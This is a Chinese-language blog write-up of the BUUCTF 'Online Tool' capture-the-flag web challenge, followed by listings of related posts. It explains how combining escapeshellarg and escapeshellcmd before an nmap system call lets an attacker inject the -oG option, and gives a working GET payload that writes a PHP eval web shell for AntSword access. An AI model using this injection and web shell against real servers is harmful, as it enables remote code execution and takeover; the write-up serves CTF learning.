buuctf之Online Tool解题思路

于 2024-09-16 20:34:06 发布
阅读量407 收藏 4
点赞数 12
分类专栏: web刷题WP 文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65853019/article/details/142306726
版权

题目给出:

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

代码分析:isset()判断变量是否为NULL,空为0。

REMOTE_ADDR和HTTP_X_FORWARDED_FOR获取访问页面的主机IP,而$_SERVER[]是通过服务器进行获取特定参数值。

$_SERVER['DOCUMENT_ROOT']文件根目录
$_SERVER['HTTP_HOST']客户端发送请求时指定的域名
$_SERVER['HTTP_USER_AGENT']客户端发送请求的用户代理
$_SERVER['PHP_SELF']当前执行脚本的文件名
$_SERVER['QUERY_STRING']请求字符串(?后面的内容)
$_SERVER['REMOTE_ADDR']客户端的IP地址
$_SERVER['REQUEST_METHOD']访问页面的请求方法
$_SERVER['REQUEST_URI']包含查询字符串的当前请求URI

escapeshellarg()+escapeshellcmd()绕过:

escapeshellarg()函数会将输入字符串中含有的特殊字符进行转义(绝大多数直接加\,反引号`转义为``````)后,用单引号包裹转义符号\,操作如下:

单引号 ('):转义为 \'。
双引号 ("):转义为 \"。
反斜杠 (\):转义为 \\。
美元符号 ($):转义为 \$。
反引号 (`):转义为 ``````。
感叹号 (!):转义为 \!。
分号 (;):转义为 \;。
大于号 (>):转义为 \>。
小于号 (<):转义为 \<。
垂直线 (|):转义为 \|。
与号 (&):转义为 \&。
空格 ( ):转义为 \ 。

escapeshellcmd()函数的操作如下:

'变为\'
"变为\"
删除命令字符串中的换行符\n
删除命令字符串中的回车符\r
exp执行原理:
构造的exp:172.17.0.2' -v -d a=1
当进行escapeshellarg()函数处理后,会先进行字符转义,变为
'172.17.0.2\' -v -d a=1'
然后用单引号包裹转义符号\
'172.17.0.2'\'' -v -d a=1'
经过escapeshellcmd()函数处理后,对\和最后不配对的单引号进行转义
'172.17.0.2'\\'' -v -d a=1\'

mkdir($sandbox)创建该变量$sandbox的目录,chdir($sandbox)切换当前目录到变量$sandbox指定的目录。

system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);使用system函数来执行一个外部命令,即nmap命令。nmap是一个开源的网络扫描和安全审计工具。-T5:设置扫描的速度为5,nmap的速度等级从0到5,数字越大,扫描速度越快,但对目标网络的负载也越大。-sT:使用TCP connect()扫描,这是最基本的扫描类型,直接连接到目标端口,查看服务是否响应。-Pn:假设所有主机都是在线的,跳过主机发现阶段。--host-timeout 2:设置每次主机扫描的超时时间为2秒,如果在这段时间内没有收到响应,nmap将认为该主机没有响应。-F:快速扫描模式,只扫描在nmap-services文件中列出的端口(通常是100个最常用的端口)。".$host":变量$host应该包含要扫描的目标主机的IP地址或域名。综上所述,其目的是使用nmap以最快的速度、TCP connect()扫描方式、跳过主机发现阶段、每次扫描超时时间为2秒、只扫描最常用的100个端口来扫描变量$host指定的目标主机。

nmap存在参数-oG可以实现将命令和结果写入文件,尝试构造host:

127.0.0.1 <?php @eval();?> -oG hack.php

如果直接传入,会被认为是字符串无法写入马,所以要在前面加单引号,后面加空格和单引号:

'127.0.0.1 <?php @eval();?> -oG hack.php '

传进去之后变为:

''127.0.0.1 <?php @eval();?> -oG hack.php ''

经过escapeshellarg()函数处理后:

'\'127.0.0.1 <?php @eval();?> -oG hack.php \''

用引号将转义符号括起来:

''\''127.0.0.1 <?php @eval();?> -oG hack.php '\'''

经过escapeshellcmd()函数处理后:

''\\''127.0.0.1 <?php @eval();?> -oG hack.php '\\'''

执行结果会对目标\127.0.0.1发送命令<?php @eval();?> -oG hack.php \写入文件

最终的payload为:

?host='127.0.0.1 <?php @eval($_POST["hack"]);?> -oG hack.php '

或者:

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '

以GET方式请求之后会得到:you are in sandbox ...后面显示的MD5值就是创建的虚拟目录,再次写入到url中:

端口后面的就是刚才创建的虚拟目录,再加上hack.php,send之后再使用蚁剑连接,根目录下就能看到flag。

sszdlbw
关注
专栏目录
[BUUCTF 2018]Online Tool解题思路&过程
iamblackcat's blog
10-15 449
[BUUCTF 2018]Online Tool解题思路&过程
[BUUCTF 2018]Online Tool1
whale_waves的博客
12-06 1063
首先是进行判断http信息头里是否在HTTP_X_FORWARDED_FOR并且是否有参数 $_SERVER[“HTTP_X_FORWARDED_FOR”] 的值才是客户端真正的IP(如果是多层代理,该值可能是由客户端真正IP和多个代理服务器的IP组成,由逗号“,”分隔)将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。这里用的两个函数其实就是确保命令到system或者exec里执行时是安全的。
第三十三题——[BUUCTF 2018]Online Tool
分享简单的安全技术
04-22 245
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $
BUUCTF解题web十一道(03)
qq_45837896的博客
06-09 762
[极客大挑战 2019]HardSQL 看这个标题着实心里一紧,完了,写不出来了? 又是同一系列,这次看看有什么新挑战 输入万能密码 出现这个,应该是敏感字符过滤,然后试了几次,发现+,=,and,<,>,空格,tab,换行都被过滤 测试闭合 单引号 是,有个闭合错误,但是这样不能用联合注入和堆叠注入,没有空格可以用,只能考虑报错注入 好家伙报错注入忘记很多,再看一遍 报错注入常见函数: updatexml(),extractvalue,floor() floor(rand(0
buuctf刷题之旅之web(二)
qq_50589021的博客
08-19 3532
2021-5-23 [BUUCTF 2018]Online Tool 题目: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GE
网络安全ctf比赛 学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线
2303_79055586的博客
04-29 626
培根密码:https://mothereff.in/bacon摩尔斯电码:http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx盲文在线解密:https://www.dcode.fr/braille-alphabet凯撒密码:https://www.dcode.fr/caesar-cipher进制转换:https://tool.oschina.net/hexconvert/词频分析:https://quipqiup.com/
BUUCTF Web 第二页全部Write ups
yym68686
07-09 1924
目录[强网杯 2019]高明的黑客[BUUCTF 2018]Online Tool[RoarCTF 2019]Easy Java[GXYCTF2019]BabyUpload[GXYCTF2019]禁止套娃方法一方法二方法三[BJDCTF2020]The mystery of ip[GWCTF 2019]我有一个数据库[BJDCTF2020]Mark loves cat[BJDCTF2020]ZJCTF,不过如此[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[De1CTF 201
web-ctf】ctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 2072
ctf_BUUCTF_web
BUUCTF全题解目录(一)
qq_42812036的博客
02-13 3542
web [HCTF 2018]WarmUp 全解:https://www.jianshu.com/p/1c2998973197 PHP 代码审计 phpmyadmin 4.8.1任意文件包含 [强网杯 2019]随便注 比赛web题全解:https://www.jianshu.com/p/db6e2576b674 fuzz一下,过滤规则得出,然后 show tables =>得表名 show...
BUUCTF 2018 Online Tool
热门推荐
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
buuctfOnline tool 命令执行&RCE&nmap
qq_37301470的博客
11-21 3160
Online tool 被自己蠢到了,一句话上传成功后没看见沙盒地址,一直蚁剑连接失败。。。 有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 3963
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
BUUCTF__[BUUCTF 2018]Online Tool_题解
风过江南乱的博客
07-18 822
前言 今天看到了一位学长写的关于这题的wp。 有一句:“我到底到什么时候,才能学会,看知识点写题,而不是看题解写题。” 太真实了。。。有点迷。 研究 看题目源码就目标很明确,利用$host 变量system()命令执行 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['h
【ArcGIS微课1000例】0025:ArcGIS Online当前未连接到在线资源终极解决办法
「 刘一哥与GIS的故事」
05-28 5985
打开ArcGIS时,系统托盘提示“ArcGIS Online当前未连接到在线资源”,如下图所示,如果无法连接到ArcGIS Online,则就无法添加在线资源,如World Imagery等。 关于该问题,网上有多种解决办法,然而都不太好使,本文提供的办法即可快速解决在线连接。 快捷键Win+R,打开运行窗口,输入:inetcpl.cpl.,回车。 在【高级】选项卡下找到【使用TLS 1.2】→勾选→【确定】。 执行以上操作,如果弹出证书不可用,则点击【查看证书】,再安装对应的证书,完成即可。 连接
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2595
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 2029
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全实训八(y0usef靶机渗透实例)
Wrop的博客
09-12 428
y0usef靶机渗透实例
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 750
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值